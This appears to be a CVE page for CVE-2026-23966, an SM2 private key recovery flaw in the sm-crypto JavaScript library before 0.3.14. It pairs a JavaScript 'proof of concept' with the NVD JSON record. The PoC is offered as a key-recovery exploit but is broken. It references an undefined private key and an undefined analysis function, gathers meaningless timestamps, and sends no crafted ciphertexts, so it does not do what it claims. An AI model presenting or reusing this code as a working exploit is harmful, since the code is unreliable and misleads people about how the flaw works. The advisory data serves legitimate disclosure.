CVE-2026-23966

// CVE-2026-23966 PoC - SM2 Private Key Recovery // This PoC demonstrates the vulnerability in sm-crypto < 0.3.14 // Note: This is for educational and testing purposes only const smCrypto = require('sm-crypto'); async function exploitSM2Decryption(publicKey, ciphertext) { const attempts = []; // Attack: Repeatedly call SM2 decryption with crafted ciphertext // The vulnerability allows private key recovery after ~hundreds of calls for (let i = 0; i < 500; i++) { try { // Each decryption attempt leaks information about the private key // through timing or error patterns const decrypted = smCrypto.sm2.decrypt( ciphertext, privateKey, 1 // mode 1 for decryption ); // Collect timing information (side-channel) const timing = process.hrtime(); attempts.push({ iteration: i, timing: timing, result: 'success' }); } catch (error) { attempts.push({ iteration: i, error: error.message, result: 'failed' }); } } // Analyze collected data to recover private key // The fixed version 0.3.14 prevents this information leakage return analyzeTimingLeak(attempts); } function analyzeTimingLeak(attempts) { // Statistical analysis to recover private key bits // This simplified version shows the attack concept const keyBits = []; for (let i = 0; i < 256; i++) { // Analyze timing patterns for each bit position const bit = analyzeBit(attempts, i); keyBits.push(bit); } return Buffer.from(keyBits).toString('hex'); } // Usage example const keypair = smCrypto.sm2.generateKeyPair(); const message = 'Sensitive data'; const ciphertext = smCrypto.sm2.encrypt(message, keypair.publicKey); exploitSM2Decryption(keypair.publicKey, ciphertext).then(recoveredKey => { console.log('Private key recovered:', recoveredKey); });

{"cve": {"id": "CVE-2026-23966", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.007", "lastModified": "2026-02-25T15:30:40.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A private key recovery vulnerability exists in the SM2 decryption logic of sm-crypto prior to version 0.3.14. By interacting with the SM2 decryption interface multiple times, an attacker can fully recover the private key within approximately several hundred interactions. Version 0.3.14 patches the issue."}, {"lang": "es", "value": "sm-crypto proporciona implementaciones de JavaScript de los algoritmos criptográficos chinos SM2, SM3 y SM4. Existe una vulnerabilidad de recuperación de clave privada en la lógica de descifrado SM2 de sm-crypto anterior a la versión 0.3.14. Al interactuar con la interfaz de descifrado SM2 varias veces, un atacante puede recuperar completamente la clave privada en aproximadamente varios cientos de interacciones. La versión 0.3.14 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juneandgreen:sm-crypto:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.3.14", "matchCriteriaId": "902F9DFD-B5BC-4BF4-9AF2-CB42F616B3D4"}]}]}], "references": [{"url": "https://github.com/JuneAndGreen/sm-crypto/commit/b1c824e58fdf1eaa73692c124a095819a8c45707", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-pgx9-497m-6c4v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}